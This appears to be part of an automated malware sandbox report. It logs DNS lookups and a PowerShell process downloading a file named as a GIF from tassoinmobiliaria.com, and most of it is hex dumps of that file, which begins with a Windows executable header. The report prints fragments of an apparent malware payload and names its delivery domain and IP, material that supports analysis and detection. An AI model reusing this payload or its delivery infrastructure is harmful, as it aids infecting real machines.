                                                                                                                                                                                                              Feb 7, 2023 19:48:30.773412943 CET5472353192.168.11.201.1.1.1
                                                                                                                                                                                                              Feb 7, 2023 19:48:31.381386995 CET53547231.1.1.1192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:10.178834915 CET5778653192.168.11.201.1.1.1
                                                                                                                                                                                                              Feb 7, 2023 19:52:10.188214064 CET53577861.1.1.1192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:11.023014069 CET6322353192.168.11.201.1.1.1
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Feb 7, 2023 19:48:30.773412943 CET192.168.11.201.1.1.10xa6d5Standard query (0)tassoinmobiliaria.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:10.178834915 CET192.168.11.201.1.1.10xbd9aStandard query (0)broadcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:11.023014069 CET192.168.11.201.1.1.10x2bc6Standard query (0)www.broadcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Feb 7, 2023 19:48:31.381386995 CET1.1.1.1192.168.11.200xa6d5No error (0)tassoinmobiliaria.com148.163.69.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:10.188214064 CET1.1.1.1192.168.11.200xbd9aNo error (0)broadcom.com50.112.202.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:10.188214064 CET1.1.1.1192.168.11.200xbd9aNo error (0)broadcom.com52.13.171.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:10.188214064 CET1.1.1.1192.168.11.200xbd9aNo error (0)broadcom.com54.68.22.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:11.039393902 CET1.1.1.1192.168.11.200x2bc6No error (0)www.broadcom.comcdn.broadcom.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Feb 7, 2023 19:52:11.039393902 CET1.1.1.1192.168.11.200x2bc6No error (0)cdn.broadcom.comwww.broadcom.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              • tassoinmobiliaria.com
                                                                                                                                                                                                              • broadcom.com
                                                                                                                                                                                                              • 87.149.176.97
                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              0192.168.11.2049827148.163.69.171443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              2023-02-07 18:48:31 UTC0OUTGET /56G0/01.gif HTTP/1.1
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                                                                                                              Host: tassoinmobiliaria.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              content-type: image/gif
                                                                                                                                                                                                              cache-control: public, max-age=604800
                                                                                                                                                                                                              expires: Tue, 14 Feb 2023 18:48:32 GMT
                                                                                                                                                                                                              content-length: 450647
                                                                                                                                                                                                              date: Tue, 07 Feb 2023 18:48:32 GMT
                                                                                                                                                                                                              vary: User-Agent
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0e 23 0b 01 02 1f 00 20 03 00 00 c8 04 00 00 04 00 00 80 13 00 00 00 10 00 00 00 30 03 00 00 00 34 69 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 b8 1b 07 00 03 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 04 00 35 06 00
                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL# 04i@ 5
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 ec 1c c7 04 24 00 c0 38 69 e8 01 1d 03 00 83 c4 1c c3 8d b4 26 00 00 00 00 8d b6 00 00 00 00 57 56 53 83 ec 10 8b 44 24 24 85 c0 75 72 8b 15 0c c0 38 69 85 d2 7e 57 83 ea 01 31 ff be 01 00 00 00 89 15 0c c0 38 69 eb 16 8d b6 00 00 00 00 c7 04 24 e8 03 00 00 ff 15 3c e1 38 69 83 ec 04 89 f8 f0 0f b1 35 a4 c3 38 69 85 c0 89 c3 75 e0 a1 a8 c3 38 69 83 f8 02 0f 84 e2 00 00 00 c7 04 24 1f 00 00 00 e8 7e 1c 03 00 b8 01 00 00 00 83 c4 10 5b 5e 5f c2 0c 00 8d b4 26 00 00 00 00 90 83 f8 01 0f 85 a7 00 00 00 64 a1 18 00 00 00 31 f6 8b
                                                                                                                                                                                                              Data Ascii: $8i&WVSD$$ur8i~W18i$<8i58iu8i$~[^_&d1
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC16INData Raw: 83 e0 10 85 c0 0f 85 da 02 00 00 b8 00 00 00 00 e9 1c 03 00 00 81 7d a4 0e 18 00 00 74 72 81 7d a4 0e 18 00 00 77 2e 83 7d a4 20 74 63 83 7d a4 20 77 0b 83 7d a4 09 74 57 e9 aa 02 00 00 81 7d a4 a0 00 00 00 74 49 81 7d a4 80 16 00 00 74 40 e9 93 02 00 00 81 7d a4 2f 20 00 00 74 32 81 7d a4 2f 20 00 00 77 13 8b 45 a4 2d 00 20 00 00 83 f8 0a 0f 87 70 02 00 00 eb 16 81 7d a4 5f 20 00 00 74 0d 81 7d a4 00 30 00 00 0f 85 58 02 00 00 b8 00 00 00 00 e9 97 02 00 00 81 7d a4 0e 18 00 00 74 6e 81 7d a4 0e 18 00 00 77 28 83 7d a4 20 74 5f 83 7d a4 20 77 08 83 7d a4 09 74 53 eb 47 81 7d a4 a0 00 00 00 74 48 81 7d a4 80 16 00 00 74 3f eb 33 81 7d a4 2f 20 00 00 74 34 81 7d a4 2f 20 00 00 77 0f 8b 45 a4 2d 00 20 00 00 83 f8 0a 77 14 eb 1c 81 7d a4 5f 20 00 00 74 13 81
                                                                                                                                                                                                              Data Ascii: }tr}w.} tc} w}tW}tI}t@}/ t2}/ wE- p}_ t}0X}tn}w(} t_} w}tSG}tH}t?3}/ t4}/ wE- w}_ t
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC32INData Raw: 8d 70 ff e9 c2 01 00 00 8b 45 30 8b 50 20 8b 45 30 8b 40 10 29 c2 89 d0 89 85 6c fe ff ff 8b 45 e4 89 c2 89 d8 8d 58 01 83 ea 6e 88 10 85 f6 74 45 89 d8 8d 58 01 c6 00 83 83 bd 28 ff ff ff 00 74 0a 89 d8 2b 85 28 ff ff ff eb 05 b8 00 00 00 00 89 85 68 fe ff ff 89 9d 28 ff ff ff 8b 85 68 fe ff ff c1 f8 08 88 03 8d 43 01 8b 95 68 fe ff ff 88 10 83 c3 02 8b 85 80 fe ff ff 89 44 24 08 8b 45 94 89 44 24 04 89 1c 24 e8 f4 a1 02 00 eb 1f 8b 45 30 89 04 24 e8 1f 8c ff ff 89 c2 8b 45 14 89 10 8b 45 14 8b 00 85 c0 0f 85 85 33 00 00 8b 45 30 8b 50 20 8b 45 30 8b 48 10 8b 45 30 8b 40 3c 89 c7 8b 85 2c ff ff ff 2b 85 6c fe ff ff 01 f8 83 e8 64 01 c8 39 c2 77 b6 8b 45 30 8b 50 10 8b 85 2c ff ff ff 01 d0 89 85 1c ff ff ff e9 a5 00 00 00 8b 85 1c ff ff ff 0f b6 00 0f b6
                                                                                                                                                                                                              Data Ascii: pE0P E0@)lEXntEX(t+(h(hChD$ED$$E0$EE3E0P E0HE0@<,+ld9wE0P,
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC48INData Raw: ff 8b 45 08 0f b6 00 3c 85 74 1e 8b 45 08 0f b6 00 3c 8a 74 14 8b 45 08 0f b6 00 3c 86 74 0a 8b 45 08 0f b6 00 3c 8b 75 07 b8 02 00 00 00 eb 05 b8 00 00 00 00 89 45 ec 8b 45 ec 8d 50 03 8b 45 08 01 d0 c7 44 24 04 01 00 00 00 89 04 24 e8 21 5c ff ff 89 45 f0 8b 45 f0 0f b6 00 89 c1 0f b6 c0 83 e8 1d 83 f8 6e 77 09 8b 04 85 48 68 37 69 ff e0 b8 00 00 00 00 e9 30 01 00 00 89 c8 3c 7d 0f 94 c0 0f b6 c0 89 44 24 08 8d 45 e4 89 44 24 04 8b 45 f0 89 04 24 e8 49 ff ff ff 89 45 e8 8b 45 e4 85 c0 79 0a b8 00 00 00 00 e9 fc 00 00 00 83 7d f4 00 79 0e 8b 5d e8 8b 45 e4 89 45 f4 e9 a7 00 00 00 3b 5d e8 75 0c 8b 45 e4 39 45 f4 0f 84 96 00 00 00 b8 00 00 00 00 e9 cd 00 00 00 83 45 f0 02 83 7d 10 00 75 0a b8 00 00 00 00 e9 b9 00 00 00 83 7d f4 00 79 15 8b 45 f0 83 c0 01
                                                                                                                                                                                                              Data Ascii: E<tE<tE<tE<uEEPED$$!\EEnwHh7i0<}D$ED$E$IEEy}y]EE;]uE9EE}u}yE
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC64INData Raw: 45 e8 0c e9 ca 4e 00 00 b8 ed ff ff ff e9 b4 4f 00 00 8b 85 74 fe ff ff 8b 40 04 89 45 88 83 7d b8 00 0f 8e ad 4e 00 00 83 7d ac 0c 75 55 8b 45 e4 8d 50 01 8b 45 08 8b 40 08 39 c2 72 45 8b 45 08 8b 40 18 25 00 00 00 08 85 c0 74 36 8b 45 08 8b 40 20 85 c0 75 2c 8b 45 08 8b 40 24 83 f8 02 75 21 8b 45 08 0f b6 40 28 0f b6 c0 39 45 b0 75 12 c7 45 a4 01 00 00 00 8b 45 a4 89 45 a0 e9 52 4e 00 00 81 7d b0 ff 00 00 00 76 16 83 7d ac 07 74 10 83 7d ac 09 74 0a 83 7d ac 0b 0f 85 05 01 00 00 81 7d b0 ff 00 00 00 0f 87 26 4e 00 00 83 7d ac 0c 0f 85 c0 00 00 00 8b 45 08 8b 40 20 85 c0 74 5a 8b 45 08 8b 40 08 39 45 e4 73 37 8b 45 08 8d 58 24 8b 45 08 8b 50 08 8b 45 08 8b 40 20 8b 8d 98 fe ff ff 89 4c 24 10 89 5c 24 0c 89 54 24 08 89 44 24 04 8b 45 e4 89 04 24 e8 fe e0
                                                                                                                                                                                                              Data Ascii: ENOt@E}N}uUEPE@9rEE@%t6E@ u,E@$u!E@(9EuEEERN}v}t}t}}&N}E@ tZE@9Es7EX$EPE@ L$\$T$D$E$
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC80INData Raw: 50 01 89 55 dc 39 45 24 7e 29 8b 85 e0 fe ff ff 83 c0 03 2b 85 9c fe ff ff 89 c2 8b 45 ec 89 10 8b 45 ec c7 40 04 00 00 00 00 83 45 ec 0c e9 fc 0e 00 00 b8 ed ff ff ff e9 89 0f 00 00 8b 45 98 83 c0 01 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 98 83 c0 02 0f b6 00 0f b6 c0 09 d0 89 85 3c fe ff ff 8b 45 98 83 c0 03 0f b6 00 3c 76 0f 85 23 01 00 00 c7 45 8c 00 00 00 00 a1 10 c0 38 69 85 c0 0f 84 f6 00 00 00 c7 85 40 ee ff ff 01 00 00 00 8b 45 98 83 c0 04 0f b6 00 0f b6 c0 89 85 44 ee ff ff 8b 45 18 89 85 48 ee ff ff 8b 85 a4 fe ff ff 89 85 4c ee ff ff 8b 85 a0 fe ff ff 2b 85 a4 fe ff ff 89 85 50 ee ff ff 8b 45 10 2b 85 a4 fe ff ff 89 85 54 ee ff ff 8b 45 e4 2b 85 a4 fe ff ff 89 85 58 ee ff ff 8b 45 98 83 c0 05 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 98 83 c0 06
                                                                                                                                                                                                              Data Ascii: PU9E$~)+EE@EEE<E<v#E8i@EDEHL+PE+TE+XEE
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC96INData Raw: 45 18 8b 50 70 8b 45 0c 83 c0 01 0f b6 00 0f b6 c0 c1 e0 08 89 c1 8b 45 0c 83 c0 02 0f b6 00 0f b6 c0 09 c8 01 d0 89 45 d8 8b 45 18 8b 40 70 39 45 d8 74 21 8b 45 d8 83 c0 03 0f b6 00 0f b6 c0 c1 e0 08 89 c2 8b 45 d8 83 c0 04 0f b6 00 0f b6 c0 09 d0 eb 05 b8 00 00 00 00 89 85 a8 fe ff ff 8b 45 18 8b 80 a4 00 00 00 89 85 7c ff ff ff eb 36 8b 85 7c ff ff ff 8b 40 04 39 85 a8 fe ff ff 75 17 8b 85 7c ff ff ff 8b 40 14 39 c6 75 0a b8 e6 ff ff ff e9 4a 3c 01 00 8b 85 7c ff ff ff 8b 00 89 85 7c ff ff ff 83 bd 7c ff ff ff 00 75 c1 8b 85 a8 fe ff ff 89 85 08 fe ff ff 8b 45 18 8b 80 90 00 00 00 89 85 14 fe ff ff 89 b5 18 fe ff ff 8b 45 18 8b 80 a4 00 00 00 89 85 04 fe ff ff 8b 45 18 8d 95 04 fe ff ff 89 90 a4 00 00 00 83 45 0c 03 8b 45 18 8b 40 10 89 85 10 fe ff ff
                                                                                                                                                                                                              Data Ascii: EPpEEEE@p9Et!EEE|6|@9u|@9uJ<|||uEEEEE@
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC112INData Raw: e9 de fc 00 00 b8 00 00 00 00 e9 d4 fc 00 00 8b 85 8c fe ff ff 01 c6 83 85 44 fd ff ff 01 8b 85 44 fd ff ff 3b 45 a4 0f 8e 50 ff ff ff 8b 45 a4 3b 45 a8 0f 84 14 fc 00 00 83 7d e4 00 0f 84 06 01 00 00 8b 45 a4 89 85 44 fd ff ff 8b 45 20 83 c0 01 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 89 34 24 e8 32 a2 ff ff 89 c3 85 db 74 07 89 d8 e9 55 fc 00 00 8b 85 44 fd ff ff 3b 45 a8 7c 0a b8 00 00 00 00 e9 40 fc 00 00 8b 45 dc 89 44 24 10 8b 45 18 89 44 24 0c 8b 45 ac 89 44 24 08 89 74 24 04 8b 45 9c 89 04 24 e8 c0 9c ff ff 89 85 88 fe ff ff 83 bd 88 fe ff ff 00 79 5f 83 bd 88 fe ff ff fe 75 06 8b 45 18 8b 70 78 8b 45 18 8b 80 88 00 00 00 85 c0 74 39 8b 45 18 8b 40 78 39 c6 72 2f 8b 45 18
                                                                                                                                                                                                              Data Ascii: DD;EPE;E}EDE D$ED$ED$ED$ED$ED$4$2tUD;E|@ED$ED$ED$t$E$y_uEpxEt9E@x9r/E
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC128INData Raw: c6 72 46 8b 45 18 8b 80 88 00 00 00 85 c0 74 2f 8b 45 18 8b 80 84 00 00 00 39 c6 76 22 8b 45 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 7e 0a b8 f4 ff ff ff e9 a4 bc 00 00 b8 00 00 00 00 e9 9a bc 00 00 89 f0 8d 70 01 0f b6 00 0f b6 c0 39 c7 75 0a b8 00 00 00 00 e9 81 bc 00 00 83 85 44 fd ff ff 01 8b 85 44 fd ff ff 3b 45 a4 7e 85 8b 45 a4 3b 45 a8 0f 84 33 bc 00 00 83 7d e4 00 0f 84 41 03 00 00 83 bd 40 fd ff ff 00 0f 84 5f 02 00 00 8b 45 a4 89 85 44 fd ff ff 8b 45 20 83 c0 01 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 89 34 24 e8 de 61 ff ff 89 c3 85 db 74 07 89 d8 e9 01 bc 00 00 8b 85 44 fd ff ff 3b 45 a8 7c 0a b8 00 00 00 00 e9 ec bb 00 00 8b 45 18 8b 40 78 39 c6
                                                                                                                                                                                                              Data Ascii: rFEt/E9v"E@dE~p9uDD;E~E;E3}A@_EDE D$ED$ED$ED$ED$ED$4$atD;E|E@x9
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC144INData Raw: 74 2f 8b 45 18 8b 80 84 00 00 00 39 c6 76 22 8b 45 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 7e 0a b8 f4 ff ff ff e9 b2 7c 00 00 b8 00 00 00 00 e9 a8 7c 00 00 89 f0 8d 70 01 0f b6 00 0f b6 c0 83 f8 20 74 15 3d a0 00 00 00 74 0e 83 f8 09 74 09 83 85 44 fd ff ff 01 eb 0a b8 00 00 00 00 e9 79 7c 00 00 8b 85 44 fd ff ff 3b 45 a4 0f 8e 72 ff ff ff e9 9b 05 00 00 c7 85 44 fd ff ff 01 00 00 00 eb 7e 8b 45 18 8b 40 78 39 c6 72 46 8b 45 18 8b 80 88 00 00 00 85 c0 74 2f 8b 45 18 8b 80 84 00 00 00 39 c6 76 22 8b 45 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 7e 0a b8 f4 ff ff ff e9 13 7c 00 00 b8 00 00 00 00 e9 09 7c 00 00 89 f0 8d 70 01 0f b6 00 0f b6 c0 83 f8 20 74 16 3d a0 00 00 00 74 0f 83 f8 09 74 0a b8 00 00 00 00 e9 e3 7b 00
                                                                                                                                                                                                              Data Ascii: t/E9v"E@dE~||p t=ttDy|D;ErD~E@x9rFEt/E9v"E@dE~||p t=tt{
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC160INData Raw: 00 39 c6 0f 86 82 02 00 00 8b 45 18 c7 40 64 01 00 00 00 8b 45 18 8b 80 88 00 00 00 83 f8 01 0f 8e 66 02 00 00 b8 f4 ff ff ff e9 b4 3c 00 00 0f b6 06 0f b6 f8 83 bd 40 fd ff ff 00 0f 84 aa 01 00 00 81 ff bf 00 00 00 0f 86 9e 01 00 00 89 f8 83 e0 20 85 c0 75 28 89 f8 c1 e0 06 25 c0 07 00 00 89 c2 8d 46 01 0f b6 00 0f b6 c0 83 e0 3f 89 d7 09 c7 83 85 20 ff ff ff 01 e9 6d 01 00 00 89 f8 83 e0 10 85 c0 75 37 89 f8 c1 e0 0c 0f b7 d0 8d 46 01 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8d 46 02 0f b6 00 0f b6 c0 83 e0 3f 89 d7 09 c7 83 85 20 ff ff ff 02 e9 2d 01 00 00 89 f8 83 e0 08 85 c0 75 4e 89 f8 c1 e0 12 25 00 00 1c 00 89 c2 8d 46 01 0f b6 00 0f b6 c0 c1 e0 0c 25 00 f0 03 00 09 c2 8d 46 02 0f b6 00 0f b6 c0 c1 e0 06 25 c0 0f 00 00 09 c2 8d 46 03 0f b6
                                                                                                                                                                                                              Data Ascii: 9E@dEf<@ u(%F? mu7F%F? -uN%F%F%F
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC176INData Raw: 8b 50 08 8b 45 ac 89 50 04 8b 45 9c 83 e0 10 85 c0 74 0c 8b 45 0c 8b 50 14 8b 45 ac 89 50 08 8b 45 9c 83 e0 04 85 c0 74 0f 8b 45 0c 8b 50 0c 8b 45 ac 89 90 a8 00 00 00 8b 45 9c 83 e0 08 85 c0 74 09 8b 45 0c 8b 40 10 89 45 d8 8b 45 a8 8b 40 0c 25 00 20 00 00 85 c0 74 1c 8b 45 a8 8b 50 10 8b 45 ac 8b 40 04 39 c2 73 0c 8b 45 a8 8b 50 10 8b 45 ac 89 50 04 8b 45 a8 8b 40 0c 25 00 40 00 00 85 c0 74 1c 8b 45 a8 8b 50 14 8b 45 ac 8b 40 08 39 c2 73 0c 8b 45 a8 8b 50 14 8b 45 ac 89 50 08 83 7d d8 00 75 07 c7 45 d8 a0 aa 38 69 8b 45 a8 8b 50 08 8b 45 1c 09 d0 83 e0 10 85 c0 0f 95 c0 0f b6 c0 89 45 98 8b 45 a8 8b 40 0c 25 00 01 00 00 85 c0 0f 95 c0 0f b6 c0 89 45 94 8b 45 a8 8b 40 08 25 00 00 04 00 85 c0 0f 95 c0 0f b6 c0 89 45 90 8b 45 a8 0f b7 40 22 0f b7 d0 8b 45
                                                                                                                                                                                                              Data Ascii: PEPEtEPEPEtEPEEtE@EE@% tEPE@9sEPEPE@%@tEPE@9sEPEP}uE8iEPEEE@%EE@%EE@"E
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC192INData Raw: 01 8b 45 dc 89 45 d4 83 45 dc 20 83 7d d4 00 0f 84 de 00 00 00 83 7d 10 00 0f 84 ac 00 00 00 bb 00 00 00 00 eb 1c 8b 45 0c 01 d8 0f b6 08 8b 45 d4 01 d8 0f b6 10 8b 45 0c 01 d8 09 ca 88 10 83 c3 01 83 fb 0f 76 df bb 80 00 00 00 eb 73 89 da c1 ea 03 8b 45 d4 01 d0 0f b6 00 0f b6 d0 89 d8 83 e0 07 89 c1 d3 fa 89 d0 83 e0 01 85 c0 74 4e 89 d8 c1 e8 06 0c c0 89 45 c8 8b 45 c8 8d 50 07 85 c0 0f 48 c2 c1 f8 03 89 c1 8b 55 0c 01 ca 0f b6 12 89 d7 8b 55 c8 83 e2 07 be 01 00 00 00 89 d1 d3 e6 89 f2 89 f9 09 d1 89 c2 8b 45 0c 01 d0 89 ca 88 10 89 d8 25 c0 00 00 00 8d 58 3f 83 c3 01 81 fb ff 00 00 00 76 85 eb 28 bb 00 00 00 00 eb 1c 8b 45 0c 01 d8 0f b6 08 8b 45 d4 01 d8 0f b6 10 8b 45 0c 01 d8 09 ca 88 10 83 c3 01 83 fb 1f 76 df 8b 45 dc 0f b6 00 0f b6 c0 83 e8 62
                                                                                                                                                                                                              Data Ascii: EEE }}EEEvsEtNEEPHUUE%X?v(EEEvEb
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC208INData Raw: 2b 34 69 5b 2b 34 69 5b 2b 34 69 5b 2b 34 69 5b 2b 34 69 ae 29 34 69 ae 29 34 69 ae 29 34 69 ae 29 34 69 ae 29 34 69 5b 2b 34 69 5b 2b 34 69 5b 2b 34 69 8c 29 34 69 ae 29 34 69 8c 29 34 69 ae 29 34 69 8c 29 34 69 ae 29 34 69 8c 29 34 69 ae 29 34 69 ae 29 34 69 21 28 34 69 21 28 34 69 ae 29 34 69 5b 2b 34 69 f1 2a 34 69 f1 2a 34 69 f1 2a 34 69 f1 2a 34 69 f1 2a 34 69 f1 2a 34 69 f8 2a 34 69 f8 2a 34 69 f1 2a 34 69 f1 2a 34 69 f1 2a 34 69 f8 2a 34 69 54 2c 34 69 54 2c 34 69 54 2c 34 69 54 2c 34 69 54 2c 34 69 54 2c 34 69 74 2c 34 69 74 2c 34 69 74 2c 34 69 54 2c 34 69 54 2c 34 69 54 2c 34 69 74 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69 a9 2c 34 69
                                                                                                                                                                                                              Data Ascii: +4i[+4i[+4i[+4i[+4i)4i)4i)4i)4i)4i[+4i[+4i[+4i)4i)4i)4i)4i)4i)4i)4i)4i)4i!(4i!(4i)4i[+4i*4i*4i*4i*4i*4i*4i*4i*4i*4i*4i*4i*4iT,4iT,4iT,4iT,4iT,4iT,4it,4it,4it,4iT,4iT,4iT,4it,4i,4i,4i,4i,4i,4i,4i,4i,4i,4i,4i,4i,4i,4i
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC224INData Raw: 00 00 00 26 15 0c 00 00 00 00 00 26 1a 0c 00 00 00 00 00 10 09 0c 00 60 1c 00 00 10 07 0c 00 00 00 00 00 10 06 0c 00 00 00 00 00 17 07 06 00 00 00 00 00 17 07 07 00 00 00 00 00 17 07 08 00 00 00 00 00 0f 07 0c 00 00 00 00 00 0f 0c 03 00 00 00 00 00 0f 15 0c 00 00 00 00 00 0f 0f 0c 00 00 00 00 00 0f 1a 0c 00 00 00 00 00 08 07 0c 00 00 00 00 00 07 11 0c 00 00 00 00 00 07 07 0c 00 00 00 00 00 07 15 0c 00 00 00 00 00 28 1d 0c 00 00 00 00 00 28 07 0c 00 00 00 00 00 28 16 0c 00 00 00 00 00 28 12 0c 00 00 00 00 00 2d 07 0c 00 00 00 00 00 2d 0e 0c 00 00 00 00 00 32 07 0c 00 00 00 00 00 32 0c 03 00 00 00 00 00 18 07 0c 00 00 00 00 00 18 0c 03 00 00 00 00 00 06 07 0c 00 00 00 00 00 06 0c 03 00 00 00 00 00 33 07 0c 00 00 00 00 00 33 0c 03 00 00 00 00 00 1f 07 0c 00
                                                                                                                                                                                                              Data Ascii: &&`((((--2233
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC240INData Raw: 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 c7 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 72 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 c6 00 dd 00 dd 00 dd 00 de 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00 df 00
                                                                                                                                                                                                              Data Ascii: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                                                                                                                                                                              2023-02-07 18:48:32 UTC256INData Raw: 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 9f 00 a0 00 ce 01 cf 01 cf 01 cf 01 cf 01 cf 01 cf 01 9f 00 a0 00 9f 00 a0 00 d0 01 d0 01 d0 01 9f 00 a0 00 72 00 72 00 72 00 72 00 72 00 d1 01 d1 01 d1 01 d1 01 d2 01 d1 01 d1 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01 d3 01
                                                                                                                                                                                                              Data Ascii: rrrrr
